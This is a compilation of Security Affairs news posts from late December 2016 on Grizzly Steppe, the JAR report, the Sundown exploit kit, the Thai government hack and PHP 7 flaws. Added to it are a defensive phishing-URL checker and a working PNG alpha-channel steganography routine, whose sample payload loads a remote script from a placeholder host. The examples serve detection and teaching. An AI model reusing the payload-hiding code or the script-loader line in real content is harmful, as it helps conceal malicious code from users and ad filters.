The malware was discovered thanks to the sharing of information contained in the Grizzly Steppe JAR about Russian malicious cyber activities.

Along with the report, DHS and FBI released a sample of the malware code allegedly used in the Grizzly Steppe operation. The code was shared with executives from multiple industries in the US, which allowed the experts at Burlington Electric in Vermont to discover the intrusion.

“A code associated with the Russian hacking operation dubbed Grizzly Steppe by the Obama administration has been detected within the system of a Vermont utility, according to U.S. officials.” states the report published by the Washington Post.

“Burlington Electric said in a statement that the company detected a malware code used in the Grizzly Steppe operation in a laptop that was not connected to the organization’s grid systems. The firm said it took immediate action to isolate the laptop and alert federal authorities.”

The malicious code was spotted during a scan of a company laptop that was not connected to the grid. The company immediately took measures to contain the threat.

“We took immediate action to isolate the laptop and alerted federal officials of this finding. Our team is working with federal officials to trace this malware and prevent any other attempts to infiltrate utility systems. We have briefed state officials and will support the investigation fully,” the statement said.

Fortunately, this means that, at least in this specific case, the malware did not penetrate the US grid.

“Vermonters and all Americans should be both alarmed and outraged that one of the world’s leading thugs, Vladimir Putin, has been attempting to hack our electric grid, which we rely upon to support our quality-of-life, economy, health, and safety,” explained the Vermont Governor Peter Shumlin.

“This episode should highlight the urgent need for our federal government to vigorously pursue and put an end to this sort of Russian meddling,” he said.

Security experts at the firm Wordfence published an interesting report analyzing the PHP malware sample and the IP addresses that the US government provided as proof of the involvement of Russian hackers in the attacks on the Presidential Election.

“As an interesting side-project, we performed analysis on the PHP malware sample and the IP addresses that the US government has provided as “…technical details regarding the tools and infrastructure used by Russian civilian and military intelligence services (RIS)”. [Source]” states the report published by WordFence.

“We used the PHP malware indicator of compromise (IOC) that DHS provided to analyze the attack data that we aggregate to try to find the full malware sample. We discovered that attackers use it to try to infect WordPress websites. We found it in the attacks that we block.”

Experts from Wordfence traced the malware code to a tool available online, dubbed P.A.S., that claims to be “made in Ukraine.”

The FBI/DHS JAR refers to version 3.1.7 of the tool, while the most current version is 4.1.1b.

“One might reasonably expect Russian intelligence operatives to develop their own tools or at least use current malicious tools from outside sources,” the report says.

The report published by WordFence includes the list of IP addresses that “don’t appear to provide any association with Russia” and “are probably used by a wide range of other malicious actors.”

15% of IP addresses are associated with Tor exit nodes.

“The malware sample is old, widely used and appears to be Ukrainian. It has no apparent relationship with Russian intelligence and it would be an indicator of compromise for any website.” reads the report from WordFence.

The rest of the story is known: the Obama administration accused the Russian government of interference in internal affairs, expelled 35 Russian diplomats and blocked access to two leisure compounds used by Russian Foreign Ministry personnel.

In 2017: Cool New Tech, Ominous Cyber Threats & Increased Terrorism in the West
31.12.2016 securityaffairs Security

A lot of new and exciting technology will emerge or become more prominent in 2017 and the following is just a glimpse of what is anticipated.
IoT & Smart Home Tech

Smart home technology had been in the works for years before finally getting off to a relatively slow start. But, now that large companies like Apple, Amazon and Google have jumped onboard, smart home tech is expected to significantly pick up the pace in 2017.


In 2016, Oculus Rift was released, following which thousands of virtual reality (VR) games and apps were released on the market. And, augmented reality (AR) game, Pokémon Go, exploded on the market with over 100 million downloads. In 2017, however, VR and AR are expected to really take off.

Machine Learning

Machine learning will advance in 2017, paving the way for it to become a fixture in the workplace. This type of artificial intelligence (AI) is expected to become a component of every type of technology. For instance, robotic journalists have been in circulation for a couple of years now and this trend is expected to expand exponentially in the white collar arena. It will have a lot of impact on the job market because some positions will no longer be needed. But, the combination of automation and machine learning will usher in groundbreaking efficiency in the workplace.

Autonomous driving

More advances from makers of self-driving cars are expected. For example, since initially introducing its ‘Autopilot‘ feature in 2015, Tesla has been continuously tweaking the autonomous capabilities of its vehicles. This highlights the far-reaching capabilities self-driving technologies hold for the future. Additionally, Uber recently acquired self-driving hardware developer Otto and has subsequently put its first fleet of self-driving trucks on the road. In Pittsburgh, Uber has also conducted some real world self-driving tests with its cabs.

Chinese Technology Will Make More Significant Inroads Into the West

As an increasing number of Chinese companies are focused on European and US markets, they will continue to maintain their customer base in China. “Huawei, already a fairly well-known brand in the west, is pushing its Honor brand as a way to drop the budget image for a new demographic. And software firms are getting in the game too. Tencent, makers of WeChat (that’s ‘China’s WhatsApp’, for those playing along at home), is pushing hard into the west, taking on Facebook at its own game.”

And, what cyber threats are coming down the line in 2017?

* Old breaches surfacing – A more dangerous trend than the malware that emerged in 2016 is that of past breaches surfacing. The information in historical breaches has often been sold on the darknet for some time before the breach’s existence comes to light. That is essentially what happened to Yahoo and it happened twice in one year, when the data breaches from 2013 and 2014 resurfaced. The breaches impacted a billion and half a billion accounts respectively. As The Guardian aptly explains it: “Because data breaches can happen undetected, fixing your cybersecurity in 2016 isn’t just locking the stable door after the horse has bolted; it’s locking the stable door without even realizing the horse made its escape years ago.”

* Cyberwar – As was the case with the Stuxnet virus which destroyed Iranian nuclear centrifuges and the US Office of Personnel Management hack, the thing that makes launching a cyberwar attack appealing is that attribution is difficult. The incidents are usually explained away with hunches as opposed to being able to provide conclusive evidence. “Rock-solid attribution to not just a nation but a chain of command is almost impossible,” The Guardian’s Alex Hern has noted. And, according to security expert Hitesh Sheth, head of cybersecurity firm Vectra, “US businesses and the US government should expect an increase in the number and severity of cyber-attacks, led by select nation states and organised political and criminal entities.”

* More innovative hackers – According to Adam Meyer, chief security strategist at SurfWatch Labs, “2017 will be the year of increasingly creative [hacks].”

* Step aside single-target ransomware. Make way for the self-propagating worms of the past, such as Conficker, Nimda, and Code Red, which will return to prominence—but this time around they will carry ransomware payloads capable of infecting hundreds of machines in an astoundingly short period of time.

* DDoS attacks on IoT devices – Hackers will target all types of internet-connected endpoints and employ them in DDoS attacks, but at a higher rate than before. Network World reports that, “in the rush to roll out all manner of IoT devices, security has taken a back seat. That means more serious incidents such as the denial of service attack on domain lookup service Dyn, are highly likely. The Mirai botnet was cited as the culprit, exploiting 50 to 100 thousand IoT devices.”

* DDoS will also burgeon into a “weapon of mass obstruction” – DDoS attack firepower in 2016 catapulted to frightening levels, rising from 400Gbps to 1Tbps or more. This was due to millions of IoT devices lacking even the most basic security. That same firepower can be used to take down critical infrastructure and even the internet infrastructure of whole countries, possibly in conjunction with a physical military attack.

* Inexperienced, albeit dangerous hackers who will not need a skill set – There are now tools that are relatively easy to access, for those who are willing to pay for them. CSO Online predicts, “this trend will continue to spark the rapid growth of cybercriminals in the wild. Whether someone is politically motivated, disgruntled about something, or a career criminal, off-the-shelf hacking tools make it easier for them to make their mark and will cost companies millions in 2017.”

* Malware via third-party vendors – Third-party vendors are a potential gateway to their connected customers. So, no matter how great a business’s security system is, if that business doesn’t hold all of their third-party partners to the same level of scrutiny, their customers will always be at risk. Consider the situation involving Wendy’s in which over 1,000 franchised locations were compromised by a Point-of-Sale (PoS) malware attack. You can count on more, similar activity in 2017 and that will be the case until companies address third-party risk management.

* Shortage of IT security professionals – This is not a new issue, of course, but with more than a million vacant positions worldwide, there have never been more jobs available in cybersecurity.

* State-sponsored hackers – A concern for both organizations and governments now is the steadily growing cadres of state-sponsored hackers, who have an endless array of resources.

* The cloud & mobile computing – Applications and data are moving to the cloud. This, no doubt, will create a new aggregation of vulnerabilities. It stands to reason, though, since “the ‘cloud’ is just someone else’s computer, and by moving and sharing information across more devices and people, the attack surface grows—and so does the opportunity for attackers.”

* Drones will be used not only for attacks, but for espionage, too – Threat actors will be moving in the direction of leveraging capabilities that will allow hacking into drone signals and “dronejacking.”

* An onslaught of attacks on open source – Hackers have come to the realization that applications are an easily exploited weak spot in most organizations. Couple that with the lax job most companies are doing with securing and managing their code–even when patches are available! Hence, these types of exploits will increase in 2017–against sites, applications, and IoT devices.

* Phishing expeditions – Employees are the weakest link in security. Almost all enterprise hacks begin with phishing. However, as noted by Taylor Armerding, writing for CSO Online, “they will need to pay closer attention to the rise in popularity of free SSL certifications paired with Google’s recent initiative to label HTTP-only sites as unsafe. That will weaken security standards, driving potential spear-phishing or malware programs.”

* Hacking Cars – Automobile manufacturers don’t really know much about the software installed in the cars they make because it comes from third parties. In addition to that, this will most likely include open-source components with security vulnerabilities–a hacker’s paradise. This will also likely lead to a large-scale automobile hack, which could include “cars held for ransom, self-driving cars being hacked to obtain their location for hijacking, unauthorized surveillance and intelligence gathering, or other threats.”

* Potential for cyber attacks on grids and nuclear facilities – Again, emphasis should be placed on the human element. The Stuxnet incident demonstrated how a tenacious hacker can overcome cyber protection efforts simply by targeting vulnerable employees. This applies to both grids and nuclear facilities. And, the cybersecurity of both has been abysmally lacking.

Terrorism Trends in the West

According to a report by IHS Jane’s Terrorism and Insurgency Centre (JTIC), recent attacks by ISIS illustrate its use of returned foreign fighters to launch attacks, called for by the terror group’s central leadership. “Western members of the group in Iraq or Syria would communicate with supporters back in their home countries in order to directly encourage, support, and direct attacks therein.”

Moreover, the recent escalation in terror attacks in the West will likely continue in 2017. And, the trends contributing to the current level of terror, that have been building up for years, have not yet peaked. ISIS has exhibited a clear operational presence in Europe and it will take years to come to eliminate the threat posed by these terror groups and the individuals they recruit.

The new year will bring with it fascinating innovations in technology, which in turn will provide hackers and terrorists a multitude of new ways to launch attacks.

FBI-DHS JAR report links Russian hackers to Presidential Election hacks
31.12.2016 securityaffairs Cyber

An FBI-DHS JAR report implicates the Russian hacking groups APT28 and APT29 in the attacks against the 2016 Presidential Election.
The Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) published on Thursday a Joint Analysis Report (JAR) that provides information about the tools, infrastructure and TTPs used by the Russian civilian and military intelligence services (RIS) against the United States election.

The U.S. Government linked the cyber activity to a Russian threat actor designated GRIZZLY STEPPE. This is the first time a JAR has attributed malicious cyber activity to specific countries or threat actors.

“In foreign countries, RIS actors conducted damaging and/or disruptive cyber-attacks, including attacks on critical infrastructure networks. In some cases, RIS actors masqueraded as third parties, hiding behind false online personas designed to cause the victim to misattribute the source of the attack. This JAR provides technical indicators related to many of these operations, recommended mitigations, suggested actions to take in response to the indicators provided, and information on how to report such incidents to the U.S. Government.” States the report.

Although most of the information in the JAR was already known to experts, I invite you to focus on the first sentence of the excerpt above, because under President Obama's executive order of April 2015, an attack against critical infrastructure can trigger an unpredictable cyber response from the US Government.

The JAR reports the activity of two different RIS actors, APT28 and APT29, that participated in the cyber attacks on a US political party. APT29 (also known as Cozy Bear, Office Monkeys, CozyCar, The Dukes and CozyDuke) broke into the party's systems in summer 2015. APT28 (also known as Fancy Bear, Pawn Storm, Sofacy Group, Sednit and STRONTIUM) entered in spring 2016.

Both groups and their activities were well known to security firms and intelligence agencies due to their cyber espionage campaigns that targeted organizations and companies worldwide.

Both nation-state actors conducted numerous attacks using spear-phishing messages containing web links to a malicious dropper; APT28 in particular relied heavily on shortened URLs in its spear-phishing campaigns. Both groups set up operational infrastructure in neutral space in order to obfuscate their source infrastructure.

“APT29 has been observed crafting targeted spearphishing campaigns leveraging web links to a malicious dropper; once executed, the code delivers Remote Access Tools (RATs) and evades detection using a range of techniques. APT28 is known for leveraging domains that closely mimic those of targeted organizations and tricking potential victims into entering legitimate credentials” reads the JAR. “Once APT28 and APT29 have access to victims, both groups exfiltrate and analyze information to gain intelligence value. These groups use this information to craft highly targeted spearphishing campaigns. These actors set up operational infrastructure to obfuscate their source infrastructure, host domains and malware for targeting organizations, establish command and control nodes, and harvest credentials and other valuable information from their targets,”

Government experts explained that both groups used multiple malware families in their campaigns, including XTunnel, the Fysbis backdoor, the Komplex Trojan and Carberp.

Experts observed two waves of attacks against US targets starting in the summer of 2015 and in November 2016.

According to the FBI-DHS JAR report, nation-state hackers designated as Grizzly Steppe targeted more than US recipients in April 2015 as part of a spear phishing campaign.

“In summer 2015, an APT29 spearphishing campaign directed emails containing a malicious link to over 1,000 recipients, including multiple U.S. Government victims. APT29 used legitimate domains, to include domains associated with U.S. organizations and educational institutions, to host malware and send spearphishing emails.” Continues the report.

In spring 2016, hackers belonging to APT28 targeted the same political party with a spear-phishing email designed to trick victims into changing their email credentials. The hackers used a fake webmail domain hosted on APT28 operational infrastructure, then used the stolen credentials to gain access to target systems and exfiltrate sensitive information. APT28 breached the U.S. Democratic Congressional Campaign Committee (DCCC).

“In the spring of 2016, attackers were again successful when they tricked a spear phishing recipient to change their password through a fake web domain controlled by the attackers. “Using the harvested credentials, APT28 was able to gain access and steal content, likely leading to the exfiltration of information from multiple senior party members.””
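The credential-harvesting technique described above depends on the victim accepting a domain that closely resembles the organisation's own, often reached through a shortened URL. The block below is an added example, not code from the JAR or from any vendor, of a mail-gateway style check that flags such links. It assumes placeholder values for the organisation's legitimate domains and for the shortener list, folds common homoglyph substitutions before comparing, and catches both near-miss registrable domains and the legitimate name smuggled into a subdomain of a foreign domain. The sample message is constructed.

```python
"""Flag lookalike and shortened-URL links in e-mail text.

Added example, not code from the JAR or any vendor. LEGIT_DOMAINS and SHORTENERS
are assumed inputs: fill them with your organisation's real domains and a current
shortener list. SAMPLE is a constructed message.
"""
import re
from urllib.parse import urlparse

LEGIT_DOMAINS = {"example-party.org", "mail.example-party.org"}   # assumed
SHORTENERS = {"bit.ly", "tinyurl.com", "goo.gl", "t.co"}          # assumed, keep current
URL_RE = re.compile(r"https?://[^\s<>\"')]+")

SAMPLE = """Your mailbox is full. Reset your password at
https://mail.exarnple-party.org/reset?u=jsmith or via http://bit.ly/2x9Yz
Help: https://mail.example-party.org/help  Info: https://example-party.org.account-verify.net/login"""


def registrable(host):
    """Last two labels of a hostname (naive: ignores multi-part public suffixes such as co.uk)."""
    parts = host.lower().rstrip(".").split(".")
    return ".".join(parts[-2:])


def normalise(label):
    """Fold common homoglyph substitutions so 'exarnple' and 'examp1e' compare equal to 'example'."""
    for fake, real in (("rn", "m"), ("vv", "w"), ("cl", "d")):
        label = label.replace(fake, real)
    return label.translate(str.maketrans("0135", "oles"))


def levenshtein(a, b):
    """Plain edit distance."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_host(host, legit=LEGIT_DOMAINS, max_dist=2):
    """Verdict for one hostname: legit, shortener, lookalike, lookalike-subdomain or unknown."""
    host = host.lower().rstrip(".")
    reg = registrable(host)
    legit_regs = {registrable(d) for d in legit}
    if host in legit or reg in legit_regs:
        return "legit"
    if reg in SHORTENERS:
        return "shortener"
    for ld in legit_regs:
        org = ld.split(".")[0]
        if org in host.split(".")[:-2]:       # our name used as a label under a foreign domain
            return "lookalike-subdomain"
        if levenshtein(normalise(reg), normalise(ld)) <= max_dist:
            return "lookalike"
    return "unknown"


def scan_message(text):
    """Return [(url, verdict)] for every URL in the message, most suspicious first."""
    results = [(u, classify_host(urlparse(u).hostname or "")) for u in URL_RE.findall(text)]
    order = {"lookalike": 0, "lookalike-subdomain": 0, "shortener": 1, "unknown": 2, "legit": 3}
    return sorted(results, key=lambda r: order[r[1]])
```

The registrable-domain split is deliberately naive; in production use the public suffix list, and treat "shortener" as a verdict that requires expanding the link before a decision, since the shortened URL is exactly what hides the lookalike host from the reader.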

The JAR confirmed that information stolen by the hackers was released to the press and publicly disclosed in an attempt to interfere with the Presidential Election. The report does not explicitly refer to the DNC, but almost every security firm that analyzed the attack confirmed that the DNC was the primary target of the Russian hackers.

JAR Report

“Actors likely associated with RIS are continuing to engage in spearphishing campaigns, including one launched as recently as November 2016, just days after the U.S. election”

The JAR also includes a Recommended Mitigations section with best practices and mitigation strategies to improve the cyber security posture of organizations.

“DHS encourages network administrators to implement the recommendations below, which can prevent as many as 85 percent of targeted cyber-attacks. ” states the report.

#OpSingleGateway – Gh0s7 hacked Thai Government website in response to the recent arrests
31.12.2016 securityaffairs Cyber

#OpSingleGateway – The hacker Gh0s7 hacked Thailand's National Statistical Office (http://nso.go.th) in response to the recent arrests carried out by the Government.
The hacker Gh0s7 broke into the database of Thailand's National Statistical Office (http://nso.go.th) and leaked data through the Mega service at the following URL


The hacker acted alone; he decided to hack into a Thai Government system in response to the recent arrests by local authorities.

Thai officials announced on Monday the arrests of nine teenagers, aged between 17 and 20, who have participated in cyber-attacks against government websites.

Thai Deputy Prime Minister and Defense Minister Prawit Wongsuwan announced further arrests among the local community of hacktivists.

Last week, Thai Police arrested nine teenagers belonging to the Anonymous collective because of their participation in the hacking campaign dubbed #OpSingleGateway. The campaign was launched by Anonymous last year, when the Thai government proposed a bill that would force the country's entire Internet traffic through one single gateway.

Clearly, the bill opens the door to monitoring and censorship, which is why hackers started targeting the Government.

“I personally targeted it. and my motivations was the recent events that Thai gov arresting 9 Anonymous hackers for #OpSingleGateway,” Gh0s7 told me.

Thai members of Anonymous launched massive DDoS attacks in October 2015 against the websites of the Thai government (thaigov.go.th) and of the country's Ministry of Information, Communications and Technology (ICT) (mict.go.th).

Anonymous also breached the websites of the Thai police and of local ISPs, after which the Thai government decided to drop the “single gateway” bill.

Unfortunately, the Government proposed amendments to the existing Computer Crime Act in May 2016 and approved them on December 16. The amendments allow the authorities to monitor citizens and to censor opponents.

“Anonymous hackers tried to oppose the passing of these amendments, which allow the government to censor websites and intercept private communications without a court order, according to VoaNews.

Just like the previous year, Anonymous used a Facebook group called “Citizens Against Single Gateway” to rally the population and carry out similar DDoS attacks against government websites.” reported the bleepingcomputer.com website.

“Another of these F5-powered DDoS attacks hit Thailand’s defense ministry website on December 19. Later it was revealed that hackers also breached the Thai Police Office website two days earlier, on December 17. The website of the Ministry of Tourism and Sports was also attacked on December 23.”

Back to Gh0s7's hack: the leaked archive includes usernames and hashed passwords alongside other CMS data. The hacker told me that he compromised the server and gained root access.

“My hacks are secret as usual but I exploited their server, and gained root access.” he told me.

Sundown Exploit Kit now leverages on the steganography
31.12.2016 securityaffairs

A new variant of the Sundown exploit kit uses steganography to hide exploit code in harmless-looking image files.
Security experts from Trend Micro have spotted a new version of the Sundown exploit kit that uses steganography to hide malicious code in harmless-looking image files.

The use of steganography was recently observed in the malvertising campaigns conducted by the AdGholas and GooNky groups.

The GooNky group used steganography to hide malvertising traffic, while AdGholas used a more sophisticated technique built on the Stegano exploit kit.

Crooks encoded a script in the alpha channel of an image to deliver the malicious code via rogue ads that looked legitimate.

Earlier in December, researchers from ESET discovered that Stegano hides portions of its malicious code in the parameters controlling the transparency of the pixels of banner ads; the effect on the appearance of the images is almost imperceptible.

“The malicious version of the graphic has a script encoded in its alpha channel, which defines the transparency of each pixel. Since the modification is minor, the final picture’s color tone is only slightly different to that of the clean version,” reads the analysis published by ESET.

A similar technique was observed in a new version of the Sundown EK spotted by researchers at Trend Micro on December 27.

“On December 27, 2016, we noticed that Sundown was updated to use similar techniques. The PNG files weren’t just used to store harvested information; the malware designers now used steganography to hide their exploit code.” reads the analysis published by Trend Micro.

The updated version of Sundown has been used in several malvertising campaigns, mostly targeting users in Japan, Canada, France and the US.

“The newly updated exploit kit was used by multiple malvertising campaigns to distribute malware. The most affected countries were Japan, Canada, and France, though Japanese users accounted for more than 30% of the total targets.”

Sundown exploit kit

The new Sundown EK relies on a hidden iframe that automatically connects to a page hosting the exploit kit. The page downloads a white PNG image and decodes the malicious code it contains.

“In this updated version, the exploit kit’s malvertisement creates a hidden iframe that automatically connects to the Sundown landing page,” continues the post. “The page will retrieve and download a white PNG image. It then decodes the data in this PNG file to obtain additional malicious code.”

According to Trend Micro, the decoded code exploits the Internet Explorer flaws CVE-2015-2419 and CVE-2016-0189, and the Flash Player flaw tracked as CVE-2016-4117.
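To make the alpha-channel trick used by Stegano, and the “white PNG that decodes to code” trick used by Sundown, concrete, here is an added example in pure Python. It is not code from Trend Micro, ESET or either exploit kit: it writes a plain white RGBA PNG with a minimal encoder, hides a payload one bit per pixel in the least significant bit of the alpha channel (so opaque pixels become 254 or 255, invisible to the eye), parses the PNG back and extracts the payload, and adds a detection heuristic for ad creatives that should be fully opaque. The one-bit-per-pixel scheme, the length prefix, the 1% detection threshold and the payload string are assumptions chosen for illustration; the real kits’ encodings are not reproduced.

```python
"""Added example: hide a payload in the alpha channel of a white PNG, extract it,
and flag images whose alpha plane carries data. Pure stdlib; only 8-bit RGBA PNGs
with scanline filter 0 are handled (the only kind write_png_rgba emits)."""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def _chunk(tag: bytes, body: bytes) -> bytes:
    """One PNG chunk: 4-byte length, 4-byte tag, body, CRC32 over tag+body."""
    crc = zlib.crc32(tag + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + tag + body + struct.pack(">I", crc)


def write_png_rgba(rows):
    """Serialize rows of (r, g, b, a) tuples as an 8-bit RGBA PNG."""
    height, width = len(rows), len(rows[0])
    # filter type 0 ("None") is prepended to every scanline
    raw = b"".join(b"\x00" + bytes(v for px in row for v in px) for row in rows)
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 6, 0, 0, 0)
    return (PNG_SIG + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b""))


def read_png_rgba(data: bytes):
    """Parse an 8-bit RGBA, filter-0 PNG back into rows of (r, g, b, a)."""
    if data[:8] != PNG_SIG:
        raise ValueError("not a PNG")
    pos, idat, width, height = 8, b"", 0, 0
    while pos + 8 <= len(data):
        length, tag = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        if tag == b"IHDR":
            width, height, depth, ctype = struct.unpack(">IIBB", body[:10])
            if depth != 8 or ctype != 6:
                raise ValueError("only 8-bit RGBA is handled here")
        elif tag == b"IDAT":
            idat += body          # all IDAT chunks form one zlib stream
        elif tag == b"IEND":
            break
        pos += 12 + length        # length + tag + body + crc
    raw = zlib.decompress(idat)
    stride = 1 + 4 * width
    rows = []
    for y in range(height):
        line = raw[y * stride:(y + 1) * stride]
        if line[0] != 0:
            raise ValueError("scanline filters other than None are not handled")
        rows.append([tuple(line[1 + 4 * x:5 + 4 * x]) for x in range(width)])
    return rows


def embed_in_alpha(rows, payload: bytes):
    """Store a 4-byte length prefix plus the payload, one bit per pixel, in the
    alpha LSB. Opaque pixels end up with alpha 254 or 255: invisible to the eye."""
    bits = [(byte >> i) & 1
            for byte in struct.pack(">I", len(payload)) + payload
            for i in range(7, -1, -1)]
    if len(bits) > len(rows) * len(rows[0]):
        raise ValueError("payload does not fit in this image")
    out, k = [], 0
    for row in rows:
        new_row = []
        for r, g, b, a in row:
            if k < len(bits):
                a = 0xFE | bits[k]
                k += 1
            new_row.append((r, g, b, a))
        out.append(new_row)
    return out


def _bits_to_bytes(bits):
    return bytes(int("".join(map(str, bits[i:i + 8])), 2)
                 for i in range(0, len(bits), 8))


def extract_from_alpha(rows) -> bytes:
    """Inverse of embed_in_alpha: read the length prefix, then that many bytes."""
    bits = [px[3] & 1 for row in rows for px in row]
    length = struct.unpack(">I", _bits_to_bytes(bits[:32]))[0]
    return _bits_to_bytes(bits[32:32 + 8 * length])


def odd_alpha_fraction(rows) -> float:
    """Fraction of pixels whose alpha is neither fully transparent nor fully opaque."""
    alphas = [px[3] for row in rows for px in row]
    return sum(1 for a in alphas if 0 < a < 255) / len(alphas)


def looks_stegano(rows, threshold: float = 0.01) -> bool:
    """Heuristic for a banner that is supposed to be opaque: more than 1% of pixels
    at an in-between alpha deserves a second look (threshold is an assumption)."""
    return odd_alpha_fraction(rows) > threshold


if __name__ == "__main__":
    white = [[(255, 255, 255, 255)] * 64 for _ in range(64)]      # constructed cover image
    script = b"var s=document.createElement('script');s.src='//example.invalid/x.js';document.body.appendChild(s);"
    png = write_png_rgba(embed_in_alpha(white, script))
    back = read_png_rgba(png)
    print(extract_from_alpha(back) == script, odd_alpha_fraction(back), looks_stegano(back))
```

The detection side is the part worth keeping: an ad network or proxy that already decodes creatives can compute `odd_alpha_fraction` for free, and a flat-colour banner whose alpha plane is anything but all-0/all-255 is exactly the artifact ESET describes. Note that the check is blind to kits that hide data in the colour channels or in ancillary chunks, so it is one signal, not a verdict.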

The researchers observed threat actors using the Sundown EK to deliver the Chthonic banking Trojan, a variant of the infamous Zeus malware that crooks used in a PayPal scam in July.

Sundown currently ranks second among exploit kits, behind RIG EK, the most used crimeware kit in the criminal ecosystem.

According to security experts from Cisco Talos, the threat actors behind the Sundown exploit kit rely on an infrastructure of 80,000 malicious subdomains associated with more than 500 domains.

The experts observed that the crooks behind the Sundown EK use wildcard subdomains, which dramatically increases the number of routes for malicious traffic to the servers hosting the exploit kit.

President Obama’s executive order expelled 35 Russians from the US
30.12.2016 securityaffairs Cyber

An executive order issued by President Obama applies sanctions to Russian military and intelligence officials; 35 Russian operatives were expelled.
President Barack Obama issued an executive order to impose sanctions on a number of Russian military and intelligence officials in response to the alleged hacking campaigns against the 2016 US Presidential Election.

The US expelled 35 Russian intelligence operatives from the United States and imposed sanctions on nine entities and individuals.

The Russian individuals expelled by the US Government were working out of Russia’s consulate in San Francisco and the Russian embassy in Washington.

According to a White House fact sheet issued with the executive order, the individuals were expelled due to the “harassment of our diplomatic personnel in Russia by security personnel and police.”

The US Government sanctioned the Russian intelligence services, the GRU (Russian Main Intelligence Directorate) and the FSB (Federal Security Service), four GRU officers, and three other organizations. The actions are the Obama administration’s response to a Russian hacking and disinformation campaign used to interfere in the American election process.

The order was issued concurrently with a report from US intelligence that confirms the cyber attacks against the 2016 Presidential election aimed to influence the results of the vote.

The Department of Homeland Security and Federal Bureau of Investigation issued a Joint Analysis Report (JAR) containing “declassified technical information on Russian civilian and military intelligence services’ malicious cyber activity, to better help network defenders in the United States and abroad identify, detect, and disrupt Russia’s global campaign of malicious cyber activities,” according to an Obama administration statement.

“The JAR includes information on computers around the world that Russian intelligence services have co-opted without the knowledge of their owners in order to conduct their malicious activity in a way that makes it difficult to trace back to Russia.”

Some of the data had not been disclosed before; it is part of a declassified government report.

The JAR includes technical details about the malicious code used by the Russian intelligence services in its campaigns. The report also includes the “indicators of compromise” for the malware used by the Russian hackers.

“All Americans should be alarmed by Russia’s actions,” reads a statement by President Obama.

The executive order targets the GRU, the FSB, the Russian security company Esage Lab, the firm Special Technology Center, and Russia’s Professional Association of Designers of Data Processing Systems. The four individuals targeted by the order are the GRU chief General-Lieutenant Igor Korobov, the GRU Deputy Chief and Head of Signals Intelligence Sergey Aleksandrovich Gizunov, and the GRU First Deputy Chiefs Igor Olegovich Kostyukov and Vladimir Stepanovich Alexseyev.

The Letter from the President specifically refers to the executive order Obama issued in April 2015 and explains that the new order broadens it:

“The order amends section 1(a) of Executive Order 13694 by providing authority for blocking the property and interests in property of any person determined by the Secretary of the Treasury, in consultation with the Attorney General and the Secretary of State, to be responsible for or complicit in, or to have engaged in, directly or indirectly, cyberenabled activities originating from, or directed by persons located, in whole or in substantial part, outside the United States that are reasonably likely to result in, or have materially contributed to, a significant threat to the national security, foreign policy, or economic health or financial stability of the United States and that have the purpose or effect of … tampering with, altering, or causing a misappropriation of information with the purpose or effect of interfering with or undermining election processes or institutions.”

The order targets any individual who acts to interfere with US internal affairs, for example by conducting hacking activities or distributing information that may interfere with elections and other political events.

What will happen in the next months?

It is difficult to say: President Trump will have to either continue Obama’s approach against Russian interference or downplay the Russian threat.

On December 28, Trump responded to a question about sanctions over the hacking against US infrastructure:

“I think we ought to get on with our lives. I think that computers have complicated lives very greatly. The whole age of computer has made it where nobody knows exactly what is going on. We have speed, we have a lot of other things, but I’m not sure we have the kind, the security we need.”

Meantime President Obama confirmed that the sanctions just applied will be accompanied by other measures against any interference in US internal affairs.

“We will continue to take a variety of actions at a time and place of our choosing, some of which will not be publicised.”

“In addition to holding Russia accountable for what it has done, the United States and friends and allies around the world must work together to oppose Russia’s efforts to undermine established international norms of behavior, and interfere with democratic governance,” said President Obama.

“To that end, my Administration will be providing a report to Congress in the coming days about Russia’s efforts to interfere in our election, as well as malicious cyber activity related to our election cycle in previous elections.”

Let’s close with a curiosity: the Russian Embassy in London responded by tweeting a picture of a duck with the word LAME written across the bottom.

Check Point experts spotted three critical 0-days in PHP 7
30.12.2016 securityaffairs

Researchers at the security firm Check Point have discovered three fresh critical zero-day vulnerabilities in the latest PHP 7.
Security researchers at Check Point have discovered three critical 0-day vulnerabilities in the latest release of PHP 7.

These vulnerabilities could allow an attacker to take full control of websites running the latest release of PHP, a language that powers roughly 80 percent of websites. The bad news is that one of the vulnerabilities remains unpatched.

Security researchers at Check Point spent the last months analyzing PHP 7, focusing their efforts on the unserialize mechanism, one of the most notoriously vulnerable areas of PHP.

This is the same mechanism that was heavily exploited in PHP 5 and allowed attackers to compromise popular platforms, including Magento, vBulletin, Drupal, Joomla!, Pornhub’s website and other web servers, by sending maliciously crafted data in client cookies or to exposed API calls.

The vulnerabilities are tracked as:

CVE-2016-7479 Use After Free (UAF) Code Execution
CVE-2016-7480 Use of Uninitialized Value Code Execution
CVE-2016-7478 Remote Denial of Service
The exploitation of the first two vulnerabilities could allow an attacker to take complete control over affected servers, meaning they could be used to spread malware as well as to steal the data the servers store.

The last vulnerability triggers a remote denial of service that hangs the website, exhausts its memory, and can take the site down.


“The first vulnerability allows a remote attacker to unserialize a pathological exception object which refers to itself as the previous exception.” states the report. “When invoking the __toString method of this exception, the code iterates over the chain of exceptions. As the chain of exceptions consists of just that one object that points to itself, the iteration never terminates. “

For more technical details about the vulnerabilities, take a look at the report.

“We have reported the three vulnerabilities to the PHP security team on the 15th of September and 6th of August. The PHP security team issued fixes for two of the vulnerabilities on the 13th of October and 1st of December.”

To ensure your web server’s security, we recommend upgrading to the latest version of PHP and following PHP’s official site for news and updates.

Below is the list of vulnerable PHP versions:

CVE-2016-7479 Version <= 7.0.13
CVE-2016-7480 Version < 7.0.12
CVE-2016-7478 Version <= 7.0.13 and 5.6.26

The OSCE organization was victim of a major cyber attack
30.12.2016 securityaffairs Cyber

The Organization for Security and Co-operation in Europe (OSCE) confirmed that it suffered a “major” cyber attack.
Hackers targeted the Organization for Security and Co-operation in Europe (OSCE); the news was confirmed on Wednesday by a spokeswoman for the organization.

